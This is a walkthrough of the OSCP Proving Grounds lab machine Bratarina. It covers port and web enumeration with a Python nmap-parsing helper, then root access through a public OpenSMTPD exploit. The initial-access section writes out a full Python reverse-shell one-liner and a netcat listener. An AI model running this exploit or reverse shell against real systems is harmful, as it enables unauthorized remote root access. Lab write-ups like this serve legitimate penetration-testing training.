OSCP Proving Ground Walkthrough: Bratarina

Aleksa Zatezalo
Offensive Security Library
3 min read · Aug 7, 2023

Introduction

Bratarina is an OSCP Proving Grounds Linux box. Although Offensive Security rates it as easy, the OSCP community rates it as intermediate, and it appears on TJ Null's list of OSCP-like machines. Let's get started on solving this box.

Service Enumeration

Every penetration test begins with basic enumeration. We can start this box by running a basic port scan on Bratarina using nmap as follows:

> nmap -sC -sV -p- *BRATARINA-IP*

A basic UDP scan can be performed with the command below. A full-range UDP scan is slow, because closed UDP ports rarely answer and nmap has to wait on each one, so it is usually left running in the background while the TCP results are worked through.

> nmap -sU -p- *BRATARINA-IP*

In the TCP scan above, -sC runs nmap's default NSE script set against each open port (banner-style checks included) and -sV performs service and version detection. The TCP scan reported the following ports:

22/tcp  open   ssh
25/tcp  open   smtp
53/tcp  closed domain
80/tcp  open   http
445/tcp open   microsoft-ds

The UDP scan reported no open ports.
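As an added example (my own code, not part of the original walkthrough), the usual way to make this step faster is a two-phase scan: a quick full-range port sweep saved in grepable format (-oG), then -sC -sV against only the ports found open. The script below parses nmap's grepable output and builds that second command. The host line it parses is constructed to mirror the ports listed above; the address 192.0.2.10 and the version strings are placeholders, not Bratarina's real fingerprints.

```python
"""Two-phase nmap workflow helper: parse `nmap -p- -oG` output, rescan open ports.

Added example; the sample output below is constructed, not captured from Bratarina.
"""
from dataclasses import dataclass
from typing import Dict, List, Sequence


@dataclass(frozen=True)
class PortInfo:
    port: int
    proto: str      # tcp / udp
    state: str      # open / closed / filtered / open|filtered
    service: str    # nmap's service guess (empty if unknown)
    version: str    # -sV product/version string (empty without -sV)


def parse_grepable(text: str) -> Dict[str, List[PortInfo]]:
    """Parse nmap -oG output into {host: [PortInfo, ...]}.

    Grepable port entries look like ``22/open/tcp//ssh//OpenSSH 7.6p1/`` and are
    comma-separated after ``Ports:``; the fields of one entry are
    port/state/protocol/owner/service/rpc-info/version/.  Only the first six
    slashes are treated as field boundaries so the version field is kept whole.
    """
    results: Dict[str, List[PortInfo]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and "Status: Up" lines carry no port data
        host = line.split()[1]
        # Fields on a Host line are tab-separated: Ports: ... \tIgnored State: ...
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        entries: List[PortInfo] = []
        for raw in ports_field.split(","):
            raw = raw.strip()
            if not raw:
                continue
            parts = raw.split("/", 6)
            if len(parts) != 7:
                continue  # malformed entry: skip rather than guess
            port, state, proto, _owner, service, _rpc, version = parts
            entries.append(PortInfo(int(port), proto, state, service, version.rstrip("/")))
        results.setdefault(host, []).extend(entries)
    return results


def open_ports(entries: Sequence[PortInfo], proto: str = "tcp") -> List[int]:
    """Ports reported strictly 'open' (not open|filtered) for the given protocol."""
    return sorted(e.port for e in entries if e.proto == proto and e.state == "open")


def targeted_scan_cmd(host: str, ports: Sequence[int],
                      extra: Sequence[str] = ("-sC", "-sV")) -> List[str]:
    """argv for the phase-two scan: default scripts + version detection, open ports only."""
    if not ports:
        raise ValueError("no open ports to rescan")
    return ["nmap", *extra, "-p" + ",".join(str(p) for p in ports), host]


# Constructed sample mirroring the ports found above.  The host address and the
# version strings are placeholders for illustration only.
SAMPLE_GREPABLE = (
    "# Nmap 7.94 scan initiated as: nmap -p- -oG full.gnmap 192.0.2.10\n"
    "Host: 192.0.2.10 ()\tStatus: Up\n"
    "Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1/, "
    "25/open/tcp//smtp//OpenSMTPD/, 53/closed/tcp//domain///, "
    "80/open/tcp//http//Apache httpd 2.4/, 445/open/tcp//microsoft-ds//Samba smbd/"
    "\tIgnored State: filtered (65530)\n"
)


def demo() -> List[str]:
    """Parse the constructed sample and return the phase-two nmap command line."""
    hosts = parse_grepable(SAMPLE_GREPABLE)
    host, entries = next(iter(hosts.items()))
    return targeted_scan_cmd(host, open_ports(entries))


if __name__ == "__main__":
    import shlex
    print(shlex.join(demo()))
```

Run `nmap -p- -oG full.gnmap TARGET` first, feed the file to parse_grepable, and the returned command is the only -sC -sV scan you need; on a box with a handful of open ports this saves the minutes that scripting and version probes against all 65535 ports would cost.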

Vulnerability Scanning

We can continue this engagement by running basic vulnerability scans against the identified services. Enumeration is the crux of any penetration test, and thorough service enumeration is what yields the initial foothold. We start with a Nikto scan and an Nmap scan using the vuln script category to build a list of candidate vulnerabilities, using the commands below.

Nikto:

> nikto -h *BRATARINA-IP*

Nmap:

> nmap -p- --script=vuln *BRATARINA-IP*

Moreover, we can enumerate common web paths and applications on the port 80 web server with nmap's http-enum script:

> nmap -p80 --script=http-enum *BRATARINA-IP*

In parallel we can run dirb to brute-force directories and files on the web server. In this tutorial we use dirb's default wordlist (common.txt) by not specifying one explicitly:

> dirb http://*BRATARINA-IP*

Unfortunately, none of these scans turned up interesting URLs or any glaring vulnerability leading directly to RCE. The web application on port 80 was identified as FlaskBB. FlaskBB version 1.1.5 and below is reported vulnerable to web-shell upload according to an Exploit-DB entry, but I was unable to successfully execute the exploit.

Initial access

Initial access was obtained by circling back to the open ports and the services behind them. Exploit-DB, searchsploit and Google were all used to look for known exploits. Searchsploit turned up a Python RCE exploit for OpenSMTPD (EDB-ID 47984); before using it, confirm from the -sV output that OpenSMTPD is indeed the MTA on port 25. The exploit is found and copied with the following commands:

> searchsploit Open SMTP
> searchsploit -m 47984.py

After changing into the directory where the second searchsploit command copied the exploit, we run it with three arguments: the target IP, the SMTP port, and the command the target should execute. Here that command is a Python reverse shell:

> python3 47984.py TARGET 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"LOCAL\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'

In the command above, TARGET is the IP of the victim machine and LOCAL is the IP of our attacking machine. Before running the exploit we must start a netcat listener on the port the shell will connect back to:

> nc -nlvp 80

Many other ports are blocked by Bratarina's firewall. In cases like this, where the target's outbound firewall rules are unknown, it is best to use a port the target is already allowed to talk to (80 or 443 are the usual choices) for the reverse-shell listener. After running the exploit we get a reverse shell on port 80 running as root, so no privilege escalation or further post-exploitation is needed: we can simply change into the root directory and read the flag with cat.

That is all. Thanks for following my Bratarina walkthrough.
